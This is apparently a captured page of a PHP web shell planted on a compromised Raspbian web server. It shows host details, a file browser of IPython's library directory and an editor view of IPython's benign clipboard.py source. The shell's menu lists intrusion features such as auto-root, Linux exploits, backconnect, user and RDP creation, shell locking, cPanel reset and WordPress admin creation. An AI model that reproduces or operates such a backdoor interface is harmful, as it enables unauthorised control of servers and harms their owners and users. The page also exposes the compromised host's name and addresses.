Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
IPython /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
785
B
-rw-r--r--
backgroundjobs.py
17.37
KB
-rw-r--r--
clipboard.py
2.21
KB
-rw-r--r--
deepreload.py
11.03
KB
-rw-r--r--
demo.py
19.99
KB
-rw-r--r--
display.py
20.15
KB
-rw-r--r--
editorhooks.py
3.94
KB
-rw-r--r--
guisupport.py
6.16
KB
-rw-r--r--
inputhook.py
23.04
KB
-rw-r--r--
inputhookglut.py
5.96
KB
-rw-r--r--
inputhookgtk.py
1017
B
-rw-r--r--
inputhookgtk3.py
1012
B
-rw-r--r--
inputhookpyglet.py
3.58
KB
-rw-r--r--
inputhookqt4.py
6.64
KB
-rw-r--r--
inputhookwx.py
5.92
KB
-rw-r--r--
kernel.py
297
B
-rw-r--r--
latextools.py
6.24
KB
-rw-r--r--
lexers.py
18.25
KB
-rw-r--r--
pretty.py
27.82
KB
-rw-r--r--
security.py
3.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clipboard.py
""" Utilities for accessing the platform's clipboard. """ import subprocess from IPython.core.error import TryNext import IPython.utils.py3compat as py3compat class ClipboardEmpty(ValueError): pass def win32_clipboard_get(): """ Get the current clipboard's text on Windows. Requires Mark Hammond's pywin32 extensions. """ try: import win32clipboard except ImportError: raise TryNext("Getting text from the clipboard requires the pywin32 " "extensions: http://sourceforge.net/projects/pywin32/") win32clipboard.OpenClipboard() try: text = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT) except (TypeError, win32clipboard.error): try: text = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT) text = py3compat.cast_unicode(text, py3compat.DEFAULT_ENCODING) except (TypeError, win32clipboard.error): raise ClipboardEmpty finally: win32clipboard.CloseClipboard() return text def osx_clipboard_get(): """ Get the clipboard's text on OS X. """ p = subprocess.Popen(['pbpaste', '-Prefer', 'ascii'], stdout=subprocess.PIPE) text, stderr = p.communicate() # Text comes in with old Mac \r line endings. Change them to \n. text = text.replace(b'\r', b'\n') text = py3compat.cast_unicode(text, py3compat.DEFAULT_ENCODING) return text def tkinter_clipboard_get(): """ Get the clipboard's text using Tkinter. This is the default on systems that are not Windows or OS X. It may interfere with other UI toolkits and should be replaced with an implementation that uses that toolkit. """ try: from tkinter import Tk, TclError # Py 3 except ImportError: try: from Tkinter import Tk, TclError # Py 2 except ImportError: raise TryNext("Getting text from the clipboard on this platform " "requires Tkinter.") root = Tk() root.withdraw() try: text = root.clipboard_get() except TclError: raise ClipboardEmpty finally: root.destroy() text = py3compat.cast_unicode(text, py3compat.DEFAULT_ENCODING) return text
Close